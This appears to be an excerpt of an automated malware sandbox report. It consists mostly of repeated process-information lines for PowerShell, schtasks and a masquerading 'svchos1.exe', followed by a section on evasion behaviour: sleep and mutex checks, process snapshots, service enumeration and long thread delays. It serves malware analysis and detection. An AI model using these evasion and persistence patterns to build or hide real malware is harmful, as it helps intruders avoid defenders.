          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Documents\MM\svchos1.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DD59028_2_035DD590
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DDB8028_2_035DDB80
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0309D59029_2_0309D590
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0309DB8029_2_0309DB80
          Source: C:\Users\Public\Documents\MM\svchos1.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_28-105076
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035E1A50 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Sleep,28_2_035E1A50
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlen,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcat,lstrcat,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,28_2_035D9930
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlen,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcat,lstrcat,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,29_2_03099930
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
